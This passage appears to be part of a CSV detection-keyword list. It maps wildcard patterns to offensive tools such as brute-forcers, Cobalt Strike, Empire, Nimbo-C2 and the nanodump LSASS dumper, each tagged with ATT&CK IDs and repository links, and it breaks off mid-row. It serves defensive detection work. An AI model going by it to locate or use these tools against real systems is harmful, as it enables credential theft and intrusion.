Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/pop_p.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/pop_u.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/postgres_up.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/smtp_p.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/smtp_u.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/snmp.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/sql_p.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/sql_u.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/ssh_p.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack 
tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/ssh_u.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/ssh_up.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/telnet_p.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/telnet_u.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/telnet_up.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/user.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/vnc_p.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*Wordlist/windows_u.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z 
-*Wordlist/windows_up.txt*,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,1,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*wordlist_TLAs.txt*,offensive_tool_keyword,wordlists,package contains the rockyou.txt wordlist,T1110.001,TA0006,N/A,N/A,Credential Access,https://www.kali.org/tools/wordlists/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*--wordlist=*-passwords.txt*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*wordlist-nthash-reversed*,offensive_tool_keyword,ShuckNT,ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES),T1552.001 - T1555.003 - T1078.003,TA0006 - TA0002 - TA0040,N/A,N/A,Credential Access,https://github.com/yanncam/ShuckNT,1,1,N/A,10,1,36,4,2023-02-02T10:40:59Z,2023-01-27T07:52:47Z -*wordlist-probable.txt*,offensive_tool_keyword,wordlists,package contains the rockyou.txt wordlist,T1110.001,TA0006,N/A,N/A,Credential Access,https://www.kali.org/tools/wordlists/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*wordlists*rmg.txt*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,1,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*wordlists*rmiscout.txt*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and 
can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,1,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*wordlists/dynamic-all.txt*,offensive_tool_keyword,hashview,A web front-end for password cracking and analytics,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/hashview/hashview,1,1,N/A,10,4,319,38,2023-09-22T21:30:50Z,2020-11-23T19:21:06Z -*wordlists/fasttrack.txt*,offensive_tool_keyword,cerbrutus,Network brute force tool. written in Python. Faster than other existing solutions (including the main leader in the network brute force market).,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/Cerbrutus-BruteForcer/cerbrutus,1,1,N/A,N/A,3,290,42,2021-08-22T19:05:45Z,2021-07-07T19:11:40Z -*wordlists/rockyou.txt'*,offensive_tool_keyword,hashview,A web front-end for password cracking and analytics,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/hashview/hashview,1,1,N/A,10,4,319,38,2023-09-22T21:30:50Z,2020-11-23T19:21:06Z -*wordlists/subdomains-5000.txt*,offensive_tool_keyword,DOME,DOME - A subdomain enumeration tool,T1583 - T1595 - T1190,TA0011 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/v4d1/Dome,1,1,N/A,N/A,4,375,50,2022-03-10T12:08:17Z,2022-02-20T15:09:40Z -*wordlists/top1million.txt*,offensive_tool_keyword,DOME,DOME - A subdomain enumeration tool,T1583 - T1595 - T1190,TA0011 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/v4d1/Dome,1,1,N/A,N/A,4,375,50,2022-03-10T12:08:17Z,2022-02-20T15:09:40Z -*WorldWind Stealer.zip*,offensive_tool_keyword,WorldWind-Stealer,WorldWind Stealer This stealer sends logs directly to your telegram id from a Bot that YOU Create with telegram,T1114.002 - T1071.001 - T1552.002,TA0011 - TA0005 - 
TA0040,N/A,N/A,malware,https://github.com/Leecher21/WorldWind-Stealer,1,1,N/A,10,1,11,3,2023-03-25T09:54:01Z,2023-02-07T11:44:42Z -*WorldWind-Stealer*,offensive_tool_keyword,WorldWind-Stealer,WorldWind Stealer This stealer sends logs directly to your telegram id from a Bot that YOU Create with telegram,T1114.002 - T1071.001 - T1552.002,TA0011 - TA0005 - TA0040,N/A,N/A,malware,https://github.com/Leecher21/WorldWind-Stealer,1,1,N/A,10,1,11,3,2023-03-25T09:54:01Z,2023-02-07T11:44:42Z -*wpapcap2john.*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*wp-exploitable-plugins.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*wpscan --api-token *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*WPScan*,offensive_tool_keyword,WPScan,WPScan is a black box WordPress vulnerability scanner.,T1190 - T1210.001 - T1195,TA0007 - TA0010 - ,N/A,N/A,Web Attacks,https://github.com/wpscanteam/wpscan,1,1,N/A,N/A,10,7829,1230,2023-10-02T10:48:40Z,2012-07-11T20:27:47Z -*wrap_execute_assembly*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*wrap_execute_encoded_powershell*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*wrap_get_clipboard*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and 
lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*wrap_inject_shellc*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*wrap_load_memfd*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*wrap_unhook_ntdll*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*write_cs_teamserver*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - 
T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*write_payload_dll_transacted*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*write_what_where.py*,offensive_tool_keyword,POC,POC to check for CVE-2020-0796 / SMBGhost,T1210.001 - T1213 - T1212 - T1201,TA0007 - TA0002,N/A,N/A,Exploitation tools,https://github.com/ZecOps/CVE-2020-0796-LPE-POC,1,1,N/A,N/A,3,242,90,2020-04-02T08:01:38Z,2020-03-30T16:06:50Z -*WriteAndExecuteShellcode*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*WriteDLLPermission.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Write-HijackDll*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-BypassUAC.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Write-HijackDll*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,PowerUp.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Write-HijackDll*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Write-Output 127.0.0.1:1111*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/OpenBullet2,1,0,N/A,10,10,1329,424,2023-09-25T22:57:36Z,2020-04-23T14:04:16Z -*WritePayloadDllTransacted*,offensive_tool_keyword,cobaltstrike,A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/PPLDump_BOF,1,1,N/A,10,10,131,24,2021-09-24T07:10:04Z,2021-09-24T07:05:59Z -*Write-PortscanOut*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows 
computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Write-ServiceBinary*,offensive_tool_keyword,AD exploitation cheat sheet,Exploit an unquoted service path vulnerability to spawn a beacon,T1550 - T1555 - T1212 - T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Write-UserAddMSI*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*ws://localhost:58082*,offensive_tool_keyword,cuddlephish,Weaponized Browser-in-the-Middle (BitM) for Penetration Testers,T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001,TA0009 - TA0006,N/A,N/A,Sniffing & Spoofing,https://github.com/fkasler/cuddlephish,1,0,N/A,10,2,152,10,2023-09-06T12:25:08Z,2023-08-02T14:30:41Z -*wscript_elevator*,offensive_tool_keyword,cobaltstrike,The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - 
T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/ElevateKit,1,1,N/A,10,10,812,205,2020-06-22T21:12:24Z,2016-12-08T03:51:09Z -*WScriptBypassUAC*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1131,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - 
WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*wsl kali-linux*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,0,wsl execution,N/A,N/A,N/A,N/A,N/A,N/A -*WSPCoerce.ex*,offensive_tool_keyword,WSPCoerce,PoC to coerce authentication from Windows hosts using MS-WSP,T1557.001 - T1078.003 - T1059.003,TA0006 - TA0004 - TA0002,N/A,N/A,Exploitation tools,https://github.com/slemire/WSPCoerce,1,0,N/A,9,3,202,29,2023-09-07T14:43:36Z,2023-07-26T17:20:42Z -*WSPCoerce-main*,offensive_tool_keyword,WSPCoerce,PoC to coerce authentication from Windows hosts using MS-WSP,T1557.001 - 